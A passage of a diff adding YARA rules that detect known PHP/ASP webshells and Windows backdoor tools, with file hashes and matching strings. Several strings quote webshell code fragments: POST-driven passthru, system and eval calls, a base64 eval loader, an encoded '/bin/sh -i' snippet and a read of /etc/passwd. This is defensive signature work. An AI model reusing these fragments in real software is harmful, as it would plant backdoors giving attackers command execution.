+ hash3 = "4f83bc2836601225a115b5ad54496428a507a361"
+ strings:
+ $s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword
+ $s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword
+ $s6 = "onfocus=\"if (this.value == 'Kullan" fullword
+ $s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">"
+ condition:
+ 2 of them
+}
+rule WebShell_Generic_PHP_9 {
+ meta:
+ description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18"
+ hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"
+ hash2 = "0daed818cac548324ad0c5905476deef9523ad73"
+ strings:
+ $s2 = ":<b>\" .base64_decode($_POST['tot']). \"</b>\";" fullword
+ $s6 = "if (isset($_POST['wq']) && $_POST['wq']<>\"\") {" fullword
+ $s12 = "if (!empty($_POST['c'])){" fullword
+ $s13 = "passthru($_POST['c']);" fullword
+ $s16 = "<input type=\"radio\" name=\"tac\" value=\"1\">B64 Decode<br>" fullword
+ $s20 = "<input type=\"radio\" name=\"tac\" value=\"3\">md5 Hash" fullword
+ condition:
+ 3 of them
+}
+rule WebShell__PH_Vayv_PHVayv_PH_Vayv {
+ meta:
+ description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"
+ hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"
+ hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"
+ strings:
+ $s4 = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle"
+ $s12 = "<? if ($ekinci==\".\" or $ekinci==\"..\") {" fullword
+ $s17 = "name=\"duzenx2\" value=\"Klas" fullword
+ condition:
+ 2 of them
+}
+rule WebShell_Generic_PHP_1 {
+ meta:
+ description = "PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b"
+ hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04"
+ hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c"
+ hash3 = "b79709eb7801a28d02919c41cc75ac695884db27"
+ strings:
+ $s1 = "$token = substr($_REQUEST['command'], 0, $length);" fullword
+ $s4 = "var command_hist = new Array(<?php echo $js_command_hist ?>);" fullword
+ $s7 = "$_SESSION['output'] .= htmlspecialchars(fgets($io[1])," fullword
+ $s9 = "document.shell.command.value = command_hist[current_line];" fullword
+ $s16 = "$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $"
+ $s19 = "if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {" fullword
+ $s20 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword
+ condition:
+ 5 of them
+}
+rule WebShell_Generic_PHP_2 {
+ meta:
+ description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+ hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+ hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+ hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+ strings:
+ $s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword
+ $s4 = "\\$port = {$_POST['port']};" fullword
+ $s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword
+ $s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u"
+ $s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]"
+ condition:
+ 4 of them
+}
+rule WebShell__CrystalShell_v_1_erne_stres {
+ meta:
+ description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+ hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687"
+ hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+ strings:
+ $s1 = "<input type='submit' value=' open (shill.txt) '>" fullword
+ $s4 = "var_dump(curl_exec($ch));" fullword
+ $s7 = "if(empty($_POST['Mohajer22'])){" fullword
+ $s10 = "$m=$_POST['curl'];" fullword
+ $s13 = "$u1p=$_POST['copy'];" fullword
+ $s14 = "if(empty(\\$_POST['cmd'])){" fullword
+ $s15 = "$string = explode(\"|\",$string);" fullword
+ $s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword
+ condition:
+ 5 of them
+}
+rule WebShell_Generic_PHP_3 {
+ meta:
+ description = "PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4"
+ hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be"
+ hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976"
+ hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289"
+ strings:
+ $s0 = "header('Content-Length:'.filesize($file).'');" fullword
+ $s4 = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma"
+ $s7 = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword
+ $s14 = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword
+ $s20 = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword
+ condition:
+ all of them
+}
+rule WebShell_Generic_PHP_4 {
+ meta:
+ description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+ hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+ hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d"
+ hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+ hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+ strings:
+ $s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
+ $s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword
+ $s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword
+ $s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword
+ $s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword
+ $s10 = "foreach ($arr as $filename) {" fullword
+ $s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword
+ condition:
+ all of them
+}
+rule WebShell_Generic_PHP_5 {
+ meta:
+ description = "PHP Webshells Github Archive - from files ex0shell.php, megabor.php, GRP WebShell 2.0 release build 2018 (C)2006,Great.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "64461ad8d8f23ea078201a31d747157f701a4e00"
+ hash1 = "3df1afbcfa718da6fc8af27554834ff6d1a86562"
+ hash2 = "ad86ef7f24f75081318146edc788e5466722a629"
+ strings:
+ $s0 = "(($perms & 0x0400) ? 'S' : '-'));" fullword
+ $s10 = "} elseif (($perms & 0x8000) == 0x8000) {" fullword
+ $s11 = "if (($perms & 0xC000) == 0xC000) {" fullword
+ $s12 = "$info .= (($perms & 0x0008) ?" fullword
+ $s16 = "// Block special" fullword
+ $s18 = "$info = 's';" fullword
+ condition:
+ all of them
+}
+rule WebShell_GFS {
+ meta:
+ description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c"
+ hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822"
+ hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50"
+ strings:
+ $s0 = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword
+ $s1 = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword
+ $s2 = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm"
+ condition:
+ all of them
+}
+rule WebShell__CrystalShell_v_1_sosyete_stres {
+ meta:
+ description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
+ hash1 = "e32405e776e87e45735c187c577d3a4f98a64059"
+ hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+ strings:
+ $s1 = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword
+ $s4 = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword
+ $s11 = "scrollbar-darkshadow-color: #101842;" fullword
+ $s15 = "<a bookmark=\"minipanel\">" fullword
+ $s16 = "background-color: #EBEAEA;" fullword
+ $s18 = "color: #D5ECF9;" fullword
+ $s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border"
+ condition:
+ all of them
+}
+rule WebShell_Generic_PHP_10 {
+ meta:
+ description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
+ hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
+ hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
+ hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57"
+ strings:
+ $s2 = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword
+ $s6 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword
+ $s11 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword
+ $s12 = "else if( $mode & 0xA000 ) " fullword
+ $s17 = "$s=sprintf(\"%1s\", $type); " fullword
+ $s20 = "font-size: 8pt;" fullword
+ condition:
+ all of them
+}
+rule WebShell_Generic_PHP_11 {
+ meta:
+ description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf"
+ hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6"
+ hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351"
+ hash3 = "80aba3348434c66ac471daab949871ab16c50042"
+ strings:
+ $s5 = "$filename = $backupstring.\"$filename\";" fullword
+ $s6 = "while ($file = readdir($folder)) {" fullword
+ $s7 = "if($file != \".\" && $file != \"..\")" fullword
+ $s9 = "$backupstring = \"copy_of_\";" fullword
+ $s10 = "if( file_exists($file_name))" fullword
+ $s13 = "global $file_name, $filename;" fullword
+ $s16 = "copy($file,\"$filename\");" fullword
+ $s18 = "<td width=\"49%\" height=\"142\">" fullword
+ condition:
+ all of them
+}
+rule WebShell__findsock_php_findsock_shell_php_reverse_shell {
+ meta:
+ description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f"
+ hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"
+ hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"
+ strings:
+ $s1 = "// me at pentestmonkey@pentestmonkey.net" fullword
+ condition:
+ all of them
+}
+rule WebShell_Generic_PHP_6 {
+ meta:
+ description = "PHP Webshells Github Archive - from files c0derz shell [csh] v. 0.1.1 release.php, CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"
+ author = "Florian Roth"
+ super_rule = 1
+ hash0 = "1a08f5260c4a2614636dfc108091927799776b13"
+ hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"
+ hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
+ hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
+ hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
+ strings:
+ $s2 = "@eval(stripslashes($_POST['phpcode']));" fullword
+ $s5 = "echo shell_exec($com);" fullword
+ $s7 = "if($sertype == \"winda\"){" fullword
+ $s8 = "function execute($com)" fullword
+ $s12 = "echo decode(execute($cmd));" fullword
+ $s15 = "echo system($com);" fullword
+ condition:
+ 4 of them
+}
+
+rule Unpack_Injectt {
+ meta:
+ description = "Webshells Auto-generated - file Injectt.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "8a5d2158a566c87edc999771e12d42c5"
+ strings:
+ $s2 = "%s -Run -->To Install And Run The Service"
+ $s3 = "%s -Uninstall -->To Uninstall The Service"
+ $s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN"
+ condition:
+ all of them
+}
+rule HYTop_DevPack_fso {
+ meta:
+ description = "Webshells Auto-generated - file fso.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b37f3cde1a08890bd822a182c3a881f6"
+ strings:
+ $s0 = "<!-- PageFSO Below -->"
+ $s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli"
+ condition:
+ all of them
+}
+rule FeliksPack3___PHP_Shells_ssh {
+ meta:
+ description = "Webshells Auto-generated - file ssh.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "1aa5307790d72941589079989b4f900e"
+ strings:
+ $s0 = "eval(gzinflate(str_rot13(base64_decode('"
+ condition:
+ all of them
+}
+rule Debug_BDoor {
+ meta:
+ description = "Webshells Auto-generated - file BDoor.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "e4e8e31dd44beb9320922c5f49739955"
+ strings:
+ $s1 = "\\BDoor\\"
+ $s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
+ condition:
+ all of them
+}
+rule bin_Client {
+ meta:
+ description = "Webshells Auto-generated - file Client.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "5f91a5b46d155cacf0cc6673a2a5461b"
+ strings:
+ $s0 = "Recieved respond from server!!"
+ $s4 = "packet door client"
+ $s5 = "input source port(whatever you want):"
+ $s7 = "Packet sent,waiting for reply..."
+ condition:
+ all of them
+}
+rule ZXshell2_0_rar_Folder_ZXshell {
+ meta:
+ description = "Webshells Auto-generated - file ZXshell.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "246ce44502d2f6002d720d350e26c288"
+ strings:
+ $s0 = "WPreviewPagesn"
+ $s1 = "DA!OLUTELY N"
+ condition:
+ all of them
+}
+rule RkNTLoad {
+ meta:
+ description = "Webshells Auto-generated - file RkNTLoad.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "262317c95ced56224f136ba532b8b34f"
+ strings:
+ $s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+ $s2 = "5pur+virtu!"
+ $s3 = "ugh spac#n"
+ $s4 = "xcEx3WriL4"
+ $s5 = "runtime error"
+ $s6 = "loseHWait.Sr."
+ $s7 = "essageBoxAw"
+ $s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $"
+ condition:
+ all of them
+}
+rule binder2_binder2 {
+ meta:
+ description = "Webshells Auto-generated - file binder2.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "d594e90ad23ae0bc0b65b59189c12f11"
+ strings:
+ $s0 = "IsCharAlphaNumericA"
+ $s2 = "WideCharToM"
+ $s4 = "g 5pur+virtu!"
+ $s5 = "\\syslog.en"
+ $s6 = "heap7'7oqk?not="
+ $s8 = "- Kablto in"
+ condition:
+ all of them
+}
+rule thelast_orice2 {
+ meta:
+ description = "Webshells Auto-generated - file orice2.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "aa63ffb27bde8d03d00dda04421237ae"
+ strings:
+ $s0 = " $aa = $_GET['aa'];"
+ $s1 = "echo $aa;"
+ condition:
+ all of them
+}
+rule FSO_s_sincap {
+ meta:
+ description = "Webshells Auto-generated - file sincap.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "dc5c2c2392b84a1529abd92e98e9aa5b"
+ strings:
+ $s0 = " <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">"
+ $s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin="
+ condition:
+ all of them
+}
+rule PhpShell {
+ meta:
+ description = "Webshells Auto-generated - file PhpShell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "539baa0d39a9cf3c64d65ee7a8738620"
+ strings:
+ $s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>."
+ condition:
+ all of them
+}
+rule HYTop_DevPack_config {
+ meta:
+ description = "Webshells Auto-generated - file config.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b41d0e64e64a685178a3155195921d61"
+ strings:
+ $s0 = "const adminPassword=\""
+ $s2 = "const userPassword=\""
+ $s3 = "const mVersion="
+ condition:
+ all of them
+}
+rule sendmail {
+ meta:
+ description = "Webshells Auto-generated - file sendmail.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "75b86f4a21d8adefaf34b3a94629bd17"
+ strings:
+ $s3 = "_NextPyC808"
+ $s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)"
+ condition:
+ all of them
+}
+rule FSO_s_zehir4 {
+ meta:
+ description = "Webshells Auto-generated - file zehir4.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "5b496a61363d304532bcf52ee21f5d55"
+ strings:
+ $s5 = " byMesaj "
+ condition:
+ all of them
+}
+rule hkshell_hkshell {
+ meta:
+ description = "Webshells Auto-generated - file hkshell.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "168cab58cee59dc4706b3be988312580"
+ strings:
+ $s1 = "PrSessKERNELU"
+ $s2 = "Cur3ntV7sion"
+ $s3 = "Explorer8"
+ condition:
+ all of them
+}
+
+rule iMHaPFtp {
+ meta:
+ description = "Webshells Auto-generated - file iMHaPFtp.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "12911b73bc6a5d313b494102abcf5c57"
+ strings:
+ $s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">"
+ condition:
+ all of them
+}
+rule Unpack_TBack {
+ meta:
+ description = "Webshells Auto-generated - file TBack.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "a9d1007823bf96fb163ab38726b48464"
+ strings:
+ $s5 = "\\final\\new\\lcc\\public.dll"
+ condition:
+ all of them
+}
+rule DarkSpy105 {
+ meta:
+ description = "Webshells Auto-generated - file DarkSpy105.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "f0b85e7bec90dba829a3ede1ab7d8722"
+ strings:
+ $s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!"
+ condition:
+ all of them
+}
+rule EditServer_3 {
+ meta:
+ description = "Webshells Auto-generated - file EditServer.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "f945de25e0eba3bdaf1455b3a62b9832"
+ strings:
+ $s2 = "Server %s Have Been Configured"
+ $s5 = "The Server Password Exceeds 32 Characters"
+ $s8 = "9--Set Procecess Name To Inject DLL"
+ condition:
+ all of them
+}
+rule FSO_s_reader {
+ meta:
+ description = "Webshells Auto-generated - file reader.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b598c8b662f2a1f6cc61f291fb0a6fa2"
+ strings:
+ $s2 = "mailto:mailbomb@hotmail."
+ condition:
+ all of them
+}
+rule ASP_CmdAsp {
+ meta:
+ description = "Webshells Auto-generated - file CmdAsp.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "79d4f3425f7a89befb0ef3bafe5e332f"
+ strings:
+ $s2 = "' -- Read the output from our command and remove the temp file -- '"
+ $s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+ $s9 = "' -- create the COM objects that we will be using -- '"
+ condition:
+ all of them
+}
+rule KA_uShell {
+ meta:
+ description = "Webshells Auto-generated - file KA_uShell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "685f5d4f7f6751eaefc2695071569aab"
+ strings:
+ $s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass"
+ $s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}"
+ condition:
+ all of them
+}
+rule PHP_Backdoor_v1 {
+ meta:
+ description = "Webshells Auto-generated - file PHP Backdoor v1.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "0506ba90759d11d78befd21cabf41f3d"
+ strings:
+
+ $s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th"
+ $s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy"
+ condition:
+ all of them
+}
+rule svchostdll {
+ meta:
+ description = "Webshells Auto-generated - file svchostdll.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "0f6756c8cb0b454c452055f189e4c3f4"
+ strings:
+ $s0 = "InstallService"
+ $s1 = "RundllInstallA"
+ $s2 = "UninstallService"
+ $s3 = "&G3 Users In RegistryD"
+ $s4 = "OL_SHUTDOWN;I"
+ $s5 = "SvcHostDLL.dll"
+ $s6 = "RundllUninstallA"
+ $s7 = "InternetOpenA"
+ $s8 = "Check Cloneomplete"
+ condition:
+ all of them
+}
+rule HYTop_DevPack_server {
+ meta:
+ description = "Webshells Auto-generated - file server.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "1d38526a215df13c7373da4635541b43"
+ strings:
+ $s0 = "<!-- PageServer Below -->"
+ condition:
+ all of them
+}
+rule vanquish {
+ meta:
+ description = "Webshells Auto-generated - file vanquish.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "684450adde37a93e8bb362994efc898c"
+ strings:
+ $s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged"
+ $s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU"
+ $s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z"
+ condition:
+ all of them
+}
+rule winshell {
+ meta:
+ description = "Webshells Auto-generated - file winshell.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "3144410a37dd4c29d004a814a294ea26"
+ strings:
+ $s0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices"
+ $s1 = "WinShell Service"
+ $s2 = "__GLOBAL_HEAP_SELECTED"
+ $s3 = "__MSVCRT_HEAP_SELECT"
+ $s4 = "Provide Windows CmdShell Service"
+ $s5 = "URLDownloadToFileA"
+ $s6 = "RegisterServiceProcess"
+ $s7 = "GetModuleBaseNameA"
+ $s8 = "WinShell v5.0 (C)2002 janker.org"
+ condition:
+ all of them
+}
+rule FSO_s_remview {
+ meta:
+ description = "Webshells Auto-generated - file remview.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b4a09911a5b23e00b55abe546ded691c"
+ strings:
+ $s2 = " echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""
+ $s3 = " echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\""
+ $s4 = " echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<"
+ condition:
+ all of them
+}
+rule saphpshell {
+ meta:
+ description = "Webshells Auto-generated - file saphpshell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "d7bba8def713512ddda14baf9cd6889a"
+ strings:
+ $s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>"
+ condition:
+ all of them
+}
+rule HYTop2006_rar_Folder_2006Z {
+ meta:
+ description = "Webshells Auto-generated - file 2006Z.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "fd1b6129abd4ab177fed135e3b665488"
+ strings:
+ $s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth"
+ $s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x"
+ condition:
+ all of them
+}
+rule admin_ad {
+ meta:
+ description = "Webshells Auto-generated - file admin-ad.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "e6819b8f8ff2f1073f7d46a0b192f43b"
+ strings:
+ $s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz"
+ $s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><"
+ condition:
+ all of them
+}
+rule FSO_s_casus15 {
+ meta:
+ description = "Webshells Auto-generated - file casus15.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "8d155b4239d922367af5d0a1b89533a3"
+ strings:
+ $s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))"
+ condition:
+ all of them
+}
+rule BIN_Client {
+ meta:
+ description = "Webshells Auto-generated - file Client.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "9f0a74ec81bc2f26f16c5c172b80eca7"
+ strings:
+ $s0 = "=====Remote Shell Closed====="
+ $s2 = "All Files(*.*)|*.*||"
+ $s6 = "WSAStartup Error!"
+ $s7 = "SHGetFileInfoA"
+ $s8 = "CreateThread False!"
+ $s9 = "Port Number Error"
+ condition:
+ 4 of them
+}
+rule shelltools_g0t_root_uptime {
+ meta:
+ description = "Webshells Auto-generated - file uptime.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "d1f56102bc5d3e2e37ab3ffa392073b9"
+ strings:
+ $s0 = "JDiamondCSlC~"
+ $s1 = "CharactQA"
+ $s2 = "$Info: This file is packed with the UPX executable packer $"
+ $s5 = "HandlereateConso"
+ $s7 = "ION\\System\\FloatingPo"
+ condition:
+ all of them
+}
+rule Simple_PHP_BackDooR {
+ meta:
+ description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "a401132363eecc3a1040774bec9cb24f"
+ strings:
+ $s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he"
+ $s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn"
+ $s9 = "// a simple php backdoor"
+ condition:
+ 1 of them
+}
+rule sig_2005Gray {
+ meta:
+ description = "Webshells Auto-generated - file 2005Gray.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "75dbe3d3b70a5678225d3e2d78b604cc"
+ strings:
+ $s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;"
+ $s4 = "echo \" <a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+ $s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+ $s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;"
+ condition:
+ all of them
+}
+rule DllInjection {
+ meta:
+ description = "Webshells Auto-generated - file DllInjection.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "a7b92283a5102886ab8aee2bc5c8d718"
+ strings:
+ $s0 = "\\BDoor\\DllInjecti"
+ condition:
+ all of them
+}
+rule Mithril_v1_45_Mithril {
+ meta:
+ description = "Webshells Auto-generated - file Mithril.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "f1484f882dc381dde6eaa0b80ef64a07"
+ strings:
+ $s2 = "cress.exe"
+ $s7 = "\\Debug\\Mithril."
+ condition:
+ all of them
+}
+rule hkshell_hkrmv {
+ meta:
+ description = "Webshells Auto-generated - file hkrmv.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
